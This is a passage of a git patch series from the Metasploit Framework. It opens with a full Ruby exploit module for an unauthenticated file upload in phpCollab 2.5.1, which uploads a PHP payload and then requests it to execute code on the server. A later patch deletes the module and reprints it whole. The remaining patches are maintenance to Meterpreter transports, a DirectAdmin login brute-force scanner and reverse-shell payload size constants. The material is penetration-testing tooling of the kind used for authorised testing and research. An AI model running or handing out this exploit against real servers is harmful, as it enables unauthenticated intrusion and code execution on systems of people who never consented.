16.04.3 64-bit + }, + 'Author' => + [ + 'Nicolas SERRA ' # Vulnerability discovery + 'Nick Marcoccio "1oopho1e" ' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://www.exploit-db.com/exploits/42934/' ], + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Payload' => + { + 'DisableNops' => true + }, + 'Targets' => [ ['Automatic', {}] ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Sep 29 2017' + )) + + register_options( + [ + OptString.new('TARGETURI', [ true, "Installed path of phpCollab ", "/phpcollab/"]) + ]) + end + + def check + url = normalize_uri(target_uri.path, "general/login.php?msg=logout") + res = send_request_cgi( + 'method' => 'GET', + 'uri' => url + ) + + if res && res.body.include?('PhpCollab v2.5.1') + return Exploit::CheckCode::Appears + end + + return Exploit::CheckCode::Safe + end + + def exploit + filename = '1.php' + register_file_for_cleanup(filename) + + data = Rex::MIME::Message.new + data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload\"; filename=\"#{filename}\"") + + print_status("Uploading backdoor file: #{filename}") + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "clients/editclient.php?id=1&action=update"), + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => data.to_s + }) + + if res && res.code == 302 + print_good("Backdoor successfully created.") + else + fail_with(Failure::Unknown, "#{peer} - Error on uploading file") + end + + print_status("Trigging the exploit...") + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "logos_clients/1.php") + }, 5) + end +end From fe15ac3b82fbd24bfd9839e2178435a516cecd71 Mon Sep 17 00:00:00 2001 From: Nick Marcoccio Date: Wed, 20 Dec 2017 08:27:18 -0500 Subject: [PATCH 29/37] Removed file committed by mistake --- .../unix/webapp/phpcollab_upload_exec.rb | 92 ------------------- 1 file changed, 92 deletions(-) delete mode 100644 modules/exploits/unix/webapp/phpcollab_upload_exec.rb diff --git a/modules/exploits/unix/webapp/phpcollab_upload_exec.rb b/modules/exploits/unix/webapp/phpcollab_upload_exec.rb deleted file mode 100644 index 75c7d60126..0000000000 --- a/modules/exploits/unix/webapp/phpcollab_upload_exec.rb +++ /dev/null @@ -1,92 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Exploit::Remote - Rank = ExcellentRanking - - include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::FileDropper - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'phpCollab 2.5.1 Unauthenticated File Upload Vulnerability', - 'Description' => %q{ - This module exploits a file upload vulnerability in phpCollab 2.5.1 - which could be abused to allow unauthenticated users to execute arbitrary code - under the context of the web server user. - - The exploit has been tested on Ubuntu 16.04.3 64-bit - }, - 'Author' => - [ - 'Nicolas SERRA ' # Vulnerability discovery - 'Nick Marcoccio "1oopho1e" ' # Metasploit module - ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'https://www.exploit-db.com/exploits/42934/' ], - ], - 'Privileged' => false, - 'Platform' => ['php'], - 'Arch' => ARCH_PHP, - 'Payload' => - { - 'DisableNops' => true - }, - 'Targets' => [ ['Automatic', {}] ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Sep 29 2017' - )) - - register_options( - [ - OptString.new('TARGETURI', [ true, "Installed path of phpCollab ", "/phpcollab/"]) - ]) - end - - def check - url = normalize_uri(target_uri.path, "general/login.php?msg=logout") - res = send_request_cgi( - 'method' => 'GET', - 'uri' => url - ) - - if res && res.body.include?('PhpCollab v2.5.1') - return Exploit::CheckCode::Appears - end - - return Exploit::CheckCode::Safe - end - - def exploit - filename = '1.php' - register_file_for_cleanup(filename) - - data = Rex::MIME::Message.new - data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload\"; filename=\"#{filename}\"") - - print_status("Uploading backdoor file: #{filename}") - - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, "clients/editclient.php?id=1&action=update"), - 'ctype' => "multipart/form-data; boundary=#{data.bound}", - 'data' => data.to_s - }) - - if res && res.code == 302 - print_good("Backdoor successfully created.") - else - fail_with(Failure::Unknown, "#{peer} - Error on uploading file") - end - - print_status("Trigging the exploit...") - send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "logos_clients/1.php") - }, 5) - end -end From bfa0cad8a5bbb0bddee9af014f8375e8a806d718 Mon Sep 17 00:00:00 2001 From: Puru Date: Wed, 20 Dec 2017 20:49:36 +0545 Subject: [PATCH 30/37] Fix clipboard typo --- .../ui/console/command_dispatcher/extapi/clipboard.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb index 547ff2138f..511afb7489 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard.rb @@ -27,7 +27,7 @@ class Console::CommandDispatcher::Extapi::Clipboard "clipboard_monitor_pause" => "Pause the active clipboard monitor", "clipboard_monitor_resume" => "Resume the paused clipboard monitor", "clipboard_monitor_dump" => "Dump all captured clipboard content", - "clipboard_monitor_purge" => "Delete all captured cilpboard content without dumping it", + "clipboard_monitor_purge" => "Delete all captured clipboard content without dumping it", "clipboard_monitor_stop" => "Stop the clipboard monitor" } reqs = { From 0c867d92fd9f55421d2f908bcc975c02e8550257 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 20 Dec 2017 11:46:14 -0600 Subject: [PATCH 31/37] fix incorrect regex --- lib/msf/base/sessions/meterpreter.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb index 85aa3a4d8e..6c4e12c488 100644 --- a/lib/msf/base/sessions/meterpreter.rb +++ b/lib/msf/base/sessions/meterpreter.rb @@ -309,7 +309,7 @@ class Meterpreter < Rex::Post::Meterpreter::Client # containing a reference to the client object. This is for backward # compatibility, since the API is not explicit to the user whether this # should be a resource file or a Meterpreter script. - if File.extname(full_path) == ".rb" || File.read(full_path).match?(/\s*client\/./) + if File.extname(full_path) == ".rb" || File.read(full_path).match?(/\s*client\./) Rex::Script::Meterpreter.new(self, full_path).run(args) else console.load_resource(full_path) From 3339c3b74d2091a33f96853621b8b045c1243e56 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 20 Dec 2017 11:49:42 -0600 Subject: [PATCH 32/37] remove magic, because it causes complications with complex RC scripts --- lib/msf/base/sessions/meterpreter.rb | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb index 6c4e12c488..5368d25003 100644 --- a/lib/msf/base/sessions/meterpreter.rb +++ b/lib/msf/base/sessions/meterpreter.rb @@ -305,11 +305,8 @@ class Meterpreter < Rex::Post::Meterpreter::Client # Runs the Meterpreter script or resource file # def execute_file(full_path, args) - # Infer a Meterpreter script by it either having the .rb extension, or it - # containing a reference to the client object. This is for backward - # compatibility, since the API is not explicit to the user whether this - # should be a resource file or a Meterpreter script. - if File.extname(full_path) == ".rb" || File.read(full_path).match?(/\s*client\./) + # Infer a Meterpreter script by it having an .rb extension + if File.extname(full_path) == ".rb" Rex::Script::Meterpreter.new(self, full_path).run(args) else console.load_resource(full_path) From 9719ede3f011ddb48e0d71a864b3631de32c8f95 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 20 Dec 2017 13:12:24 -0600 Subject: [PATCH 33/37] restore transport enum used in TLVs --- lib/rex/post/meterpreter/client_core.rb | 22 +++++++++++-------- .../ui/console/command_dispatcher/core.rb | 2 +- 2 files changed, 14 insertions(+), 10 deletions(-) diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index b1d001013e..949445e6ee 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb @@ -34,12 +34,16 @@ module Meterpreter ### class ClientCore < Extension - VALID_TRANSPORTS = [ - 'reverse_tcp', - 'reverse_http', - 'reverse_https', - 'bind_tcp' - ] + METERPRETER_TRANSPORT_TCP = 0 + METERPRETER_TRANSPORT_HTTP = 1 + METERPRETER_TRANSPORT_HTTPS = 2 + + VALID_TRANSPORTS = { + 'reverse_tcp' => METERPRETER_TRANSPORT_TCP, + 'reverse_http' => METERPRETER_TRANSPORT_HTTP, + 'reverse_https' => METERPRETER_TRANSPORT_HTTPS, + 'bind_tcp' => METERPRETER_TRANSPORT_TCP + } include Rex::Payloads::Meterpreter::UriChecksum @@ -721,7 +725,7 @@ class ClientCore < Extension # def valid_transport?(transport) return false if transport.nil? - VALID_TRANSPORTS.include?(transport.downcase) + VALID_TRANSPORTS.has_key?(transport.downcase) end # @@ -875,7 +879,7 @@ private opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' request.add_tlv(TLV_TYPE_TRANS_UA, opts[:ua]) - if transport == 'reverse_https' && opts[:cert] + if transport == 'reverse_https' && opts[:cert] # currently only https transport offers ssl hash = Rex::Socket::X509Certificate.get_cert_file_hash(opts[:cert]) request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash) end @@ -896,7 +900,7 @@ private end - request.add_tlv(TLV_TYPE_TRANS_TYPE, transport) + request.add_tlv(TLV_TYPE_TRANS_TYPE, VALID_TRANSPORTS[transport]) request.add_tlv(TLV_TYPE_TRANS_URL, url) request diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb index cd81a03b10..4037415edd 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb @@ -758,7 +758,7 @@ class Console::CommandDispatcher::Core # Arguments for transport switching # @@transport_opts = Rex::Parser::Arguments.new( - '-t' => [true, "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.join(', ')}"], + '-t' => [true, "Transport type: #{Rex::Post::Meterpreter::ClientCore::VALID_TRANSPORTS.keys.join(', ')}"], '-l' => [true, 'LHOST parameter (for reverse transports)'], '-p' => [true, 'LPORT parameter'], '-i' => [true, 'Specify transport by index (currently supported: remove)'], From 7f8a5d38346fd33db1623414bf6b6cb83fedd9e9 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 20 Dec 2017 15:09:11 -0600 Subject: [PATCH 34/37] improved credential reporting --- .../framework/login_scanner/directadmin.rb | 12 ++--- .../scanner/http/directadmin_login.rb | 54 +++---------------- 2 files changed, 13 insertions(+), 53 deletions(-) diff --git a/lib/metasploit/framework/login_scanner/directadmin.rb b/lib/metasploit/framework/login_scanner/directadmin.rb index f654676d0c..87d6f87513 100644 --- a/lib/metasploit/framework/login_scanner/directadmin.rb +++ b/lib/metasploit/framework/login_scanner/directadmin.rb @@ -8,7 +8,6 @@ module Metasploit DEFAULT_PORT = 443 PRIVATE_TYPES = [ :password ] - LOGIN_STATUS = Metasploit::Model::Login::Status # Shorter name # Checks if the target is Direct Admin Web Control Panel. The login module should call this. @@ -73,7 +72,7 @@ module Metasploit }) unless res - return {:status => LOGIN_STATUS::UNABLE_TO_CONNECT, :proof => res.to_s} + return {:status => Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, :proof => res.to_s} end # After login, the application should give us a new SID @@ -82,10 +81,10 @@ module Metasploit @last_sid = sid # Update our SID if res.headers['Location'].to_s.include?('/') && !sid.blank? - return {:status => LOGIN_STATUS::SUCCESSFUL, :proof => res.to_s} + return {:status => Metasploit::Model::Login::Status::SUCCESSFUL, :proof => res.to_s} end - {:status => LOGIN_STATUS::INCORRECT, :proof => res.to_s} + {:status => Metasploit::Model::Login::Status::INCORRECT, :proof => res.to_s} end @@ -100,14 +99,15 @@ module Metasploit proof: nil, host: host, port: port, - protocol: 'tcp' + protocol: 'tcp', + service_name: ssl ? 'https' : 'http' } begin result_opts.merge!(get_login_state(credential.public, credential.private)) rescue ::Rex::ConnectionError => e # Something went wrong during login. 'e' knows what's up. - result_opts.merge!(status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: e.message) + result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e.message) end Result.new(result_opts) diff --git a/modules/auxiliary/scanner/http/directadmin_login.rb b/modules/auxiliary/scanner/http/directadmin_login.rb index a5efe92039..b57b63af36 100644 --- a/modules/auxiliary/scanner/http/directadmin_login.rb +++ b/modules/auxiliary/scanner/http/directadmin_login.rb @@ -61,63 +61,23 @@ class MetasploitModule < Msf::Auxiliary }.call end - - def report_good_cred(ip, port, result) - service_data = { - address: ip, - port: port, - service_name: 'http', - protocol: 'tcp', - workspace_id: myworkspace_id - } - - credential_data = { - module_fullname: self.fullname, - origin_type: :service, - private_data: result.credential.private, - private_type: :password, - username: result.credential.public, - }.merge(service_data) - - login_data = { - core: create_credential(credential_data), - last_attempted_at: DateTime.now, - status: result.status, - proof: result.proof - }.merge(service_data) - - create_credential_login(login_data) - end - - - def report_bad_cred(ip, rport, result) - invalidate_login( - address: ip, - port: rport, - protocol: 'tcp', - public: result.credential.public, - private: result.credential.private, - realm_key: result.credential.realm_key, - realm_value: result.credential.realm, - status: result.status, - proof: result.proof - ) - end - - # Attempts to login def bruteforce(ip) scanner(ip).scan! do |result| + credential_data = result.to_h.merge({ + workspace_id: myworkspace_id, + module_fullname: self.fullname, + }) case result.status when Metasploit::Model::Login::Status::SUCCESSFUL print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential}'") - report_good_cred(ip, rport, result) + create_credential_and_login(credential_data) when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT vprint_brute(:level => :verror, :ip => ip, :msg => result.proof) - report_bad_cred(ip, rport, result) + invalidate_login(credential_data) when Metasploit::Model::Login::Status::INCORRECT vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'") - report_bad_cred(ip, rport, result) + invalidate_login(credential_data) end end end From df4f62cde93673cbce3cbceab8fb30ee490f9c39 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 20 Dec 2017 15:58:17 -0600 Subject: [PATCH 35/37] bump to mettle 0.3.3 --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- .../singles/apple_ios/aarch64/meterpreter_reverse_http.rb | 2 ++ .../singles/apple_ios/aarch64/meterpreter_reverse_https.rb | 2 ++ .../singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb | 2 ++ .../singles/linux/aarch64/meterpreter_reverse_http.rb | 2 +- .../singles/linux/aarch64/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/armbe/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/armbe/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/armle/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/armle/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/armle/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mips64/meterpreter_reverse_http.rb | 2 +- .../singles/linux/mips64/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb | 2 +- .../singles/linux/mipsbe/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mipsle/meterpreter_reverse_http.rb | 2 +- .../singles/linux/mipsle/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/ppc/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/ppc/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb | 2 +- .../singles/linux/ppc64le/meterpreter_reverse_http.rb | 2 +- .../singles/linux/ppc64le/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb | 2 +- .../singles/linux/ppce500v2/meterpreter_reverse_http.rb | 2 +- .../singles/linux/ppce500v2/meterpreter_reverse_https.rb | 2 +- .../singles/linux/ppce500v2/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/x64/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/x64/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/x86/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/x86/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb | 2 +- .../payloads/singles/linux/zarch/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/linux/zarch/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb | 2 +- 44 files changed, 48 insertions(+), 42 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index e7564cd7b6..5e29273834 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -19,7 +19,7 @@ PATH metasploit-model metasploit-payloads (= 1.3.20) metasploit_data_models - metasploit_payloads-mettle (= 0.3.2) + metasploit_payloads-mettle (= 0.3.3) msgpack nessus_rest net-ssh @@ -188,7 +188,7 @@ GEM postgres_ext railties (~> 4.2.6) recog (~> 2.0) - metasploit_payloads-mettle (0.3.2) + metasploit_payloads-mettle (0.3.3) method_source (0.9.0) mini_portile2 (2.3.0) minitest (5.10.3) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index f8d00102a7..028945b2b9 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -72,7 +72,7 @@ Gem::Specification.new do |spec| # Needed for Meterpreter spec.add_runtime_dependency 'metasploit-payloads', '1.3.20' # Needed for the next-generation POSIX Meterpreter - spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.3.2' + spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.3.3' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb index c8ac809abd..9e37532887 100644 --- a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb @@ -10,6 +10,8 @@ require 'msf/base/sessions/meterpreter_aarch64_apple_ios' module MetasploitModule + CachedSize = 692552 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions include Msf::Sessions::MettleConfig diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb index 01758f1e19..34bfe5b005 100644 --- a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb @@ -10,6 +10,8 @@ require 'msf/base/sessions/meterpreter_aarch64_apple_ios' module MetasploitModule + CachedSize = 692552 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions include Msf::Sessions::MettleConfig diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb index a3d0a0181e..9ce15911e4 100644 --- a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb @@ -10,6 +10,8 @@ require 'msf/base/sessions/meterpreter_aarch64_apple_ios' module MetasploitModule + CachedSize = 692552 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions include Msf::Sessions::MettleConfig diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb index 748c528ded..86517c6bb0 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 966280 + CachedSize = 966336 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb index a153f85288..b19925fee3 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 966280 + CachedSize = 966336 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb index 97a9cad2de..62fd49d59a 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 966280 + CachedSize = 966336 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb index 48969bf801..ae4456c4b0 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 902524 + CachedSize = 902448 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb index e16a901ba3..76fd1de63e 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 902524 + CachedSize = 902448 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb index 5380aa8776..fdd00a7280 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 902524 + CachedSize = 902448 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb index 09be944245..2ffb543246 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 898776 + CachedSize = 898700 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb index bb4712dd3a..da35fc733c 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 898776 + CachedSize = 898700 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb index b22a8b742c..15d41127d5 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 898776 + CachedSize = 898700 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb index 75846e6148..2f8e28cd3b 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1384552 + CachedSize = 1384304 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb index e299cb17e8..2b8d368799 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1384552 + CachedSize = 1384304 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb index 93671fb0c4..ceb5e85981 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1384552 + CachedSize = 1384304 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index beb16c74c9..119bf179a8 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1280872 + CachedSize = 1280788 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index 1c6adb7bbf..54f2e1a0ac 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1280872 + CachedSize = 1280788 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index 942611a9d4..f9073d031f 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1280872 + CachedSize = 1280788 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb index 6d2bd7d6bb..0459025bca 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1281916 + CachedSize = 1281832 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb index 78b921b6fb..5df675af37 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1281916 + CachedSize = 1281832 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb 